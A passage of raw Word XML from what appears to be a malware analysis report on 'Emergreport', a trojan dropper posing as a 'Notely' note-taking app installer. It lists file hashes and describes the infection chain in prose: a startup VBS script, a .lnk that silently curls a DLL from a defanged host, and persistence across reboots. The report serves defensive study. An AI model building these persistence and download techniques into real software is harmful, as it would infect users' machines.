        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1525"/>
        <w:gridCol w:w="7825"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="101000000000"/>
            <w:tcW w:w="1525" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2748"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SHA256 hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100000000000"/>
            <w:tcW w:w="7825" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2748"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1866b0e00325ee8907052386a9286e6ed81695a2eb35d5be318d71d91fbce2db</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2748"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2748"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Emergreport is a x64 trojan dropper-installer malware sample, this sample appears to install a note taking app with the name of “Notely”, however, it also installs a P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dll file that is persistent in the %APPDATA% directory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2748"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2748"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">YARA signature rules are attached in Appendix A. Malware sample and hashes have been submitted to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for further examination.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2748"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2748"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc85207995"/>
      <w:r>
        <w:t>High-Level Technical Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The Emergreport installer installs the “notely.exe” file as well as 2 other malicious files. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The first being </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“Emergreport.zip” in the %APPDATA% directory, and the second is “unzip.vbs” in the startup directory, which runs every time Windows starts. The vbs file includes Visual Basic Script code that unzips the “Emergreport.zip” file and runs the file that it contains (”Emergreport.lnk”). The “Emergreport.lnk” file runs a curl command in silent mode and downloads a file from the URL “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hxxp://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>consumerfinancereport[.]local” and saves it as “oneWitch.png” in the %APPDATA% directory. The file also runs 4 ping commands on the localhost. The “oneWitch.png” file is the dropped file and is a x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">dll file that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:hAnsi="Montserrat Medium"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>contains nim code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline>
            <wp:extent cx="3841750" cy="4857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Grp="0" noSelect="0" noChangeAspect="1" noMove="0"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3841750" cy="4857750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc85207996"/>
      <w:r>
        <w:t>Malware Composition</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Emergreport</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>dropped and installed files</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4Accent1"/>
        <w:tblW w:w="10695" w:type="dxa"/>
        <w:tblInd w:w="-673" w:type="dxa"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2166"/>
        <w:gridCol w:w="8529"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cnfStyle w:val="100000000000"/>
          <w:trHeight w:val="176"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="101000000000"/>
            <w:tcW w:w="2166" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="off"/>
                <w:bCs w:val="off"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="off"/>
                <w:bCs w:val="off"/>
              </w:rPr>
              <w:t>File Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100000000000"/>
            <w:tcW w:w="8529" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="off"/>
                <w:bCs w:val="off"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="off"/>
                <w:bCs w:val="off"/>
              </w:rPr>
              <w:t>SHA256 Hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
          <w:trHeight w:val="355"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000100000"/>
            <w:tcW w:w="2166" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>notely.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000100000"/>
            <w:tcW w:w="8529" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>1e4e1ea2c70ee5634447cf20fdc35a90c7c6d82b5a43f91e613101a05fcbeba7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cnfStyle w:val="000000010000"/>
          <w:trHeight w:val="355"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000010000"/>
            <w:tcW w:w="2166" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>oneWitch.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000010000"/>
            <w:tcW w:w="8529" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>37bd2dbe0ac7c2363313493b11577fdba37af73b3ee56154cdef0cb8b07b751e</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
          <w:trHeight w:val="355"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000100000"/>
            <w:tcW w:w="2166" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>unzip.vbs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000100000"/>
            <w:tcW w:w="8529" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>1b418ec1586ad09f77550bb942c594bb5fb69abf1b046e8e428c95f4b5d01fc3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cnfStyle w:val="000000010000"/>
          <w:trHeight w:val="355"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000010000"/>
            <w:tcW w:w="2166" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Emergreport.zip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000010000"/>
            <w:tcW w:w="8529" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>bcb1a8225cb3ed89661cc8c75000e44b8c5cb563df0e00d5766d1130e7cc6231</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
          <w:trHeight w:val="355"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000100000"/>
            <w:tcW w:w="2166" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Emergreport.lnk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000100000"/>
            <w:tcW w:w="8529" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>[shortcut to the cmd.exe with special parameters]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc85207997"/>
      <w:r>
        <w:t>notely.exe</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">This PE </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">executable </w:t>
      </w:r>
      <w:r>
        <w:t>is added to the start program menu and a shortcut is made to the desktop. It is written in nim. Upon initialization, this window pops:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline>
            <wp:extent cx="4257675" cy="3086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39"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4257675" cy="3086100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Fig 1: Popup window when running notely.exe</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc85207998"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>oneWitch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>A PEdll that is downloaded from a URL (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hxxp://</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">consumerfinancereport[.]local/blog/index/witchABy.jpg), it will be </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">downloaded </w:t>
      </w:r>
      <w:r>
        <w:t>every time Windows starts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>unzip.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>vbs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>A Visual Basic Script that unzips the “Emergreport.zip” file in the %APPDATA% directory and runs its content.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>Emergreport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>A zip file containing “Emergreport.lnk”</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>Emergreport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>lnk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>A file that runs the dropper command which downloads “oneWitch.png”</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc85207999"/>
      <w:r>
        <w:t>Basic Static Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Indicators</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Compressed, howe</w:t>
      </w:r>
      <w:r>
        <w:t>ver, this is normal for a installer as it only contains data and Window's installer will do the rest of the work</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline>
            <wp:extent cx="5943600" cy="6292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40"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="629285"/>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color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Strings</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblInd w:w="0" w:type="dxa"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Folder{B31DBD05-2752-3A9D-9588-397C2548766C}C__07FB49E986E34F77A587FE1336135B89EMERGR~1.ZIP|Emergreport.zip_77D723846EB24A58852AABFE167C2217StartupFolder{A8815665-CAE9-264F-71C8-695A8585B1D0}C__77D723846EB24A58852AABFE167C2217UNZIP.VBS|unzip.vbs_7DA1215618B34D02BA9B5645CE7646E4{F2FA55AA-A64F-F08E-0659-9F7B56A0D559}C__7DA1215618B34D02BA9B5645CE7646E4NOTELY.EXE|notely.exe.:USER'S~1|User's Programs MenuProgramMenuFolderSourceDir[ProgramFilesFolder][Manufacturer]\\[ProductName]DIRCA_TARGETDIRTARGETDIR=\"\".:USER'S</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">~2|User's Startup Folder.:USER'S~3|User's Application Data Folder.:USER'S~4|User's </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
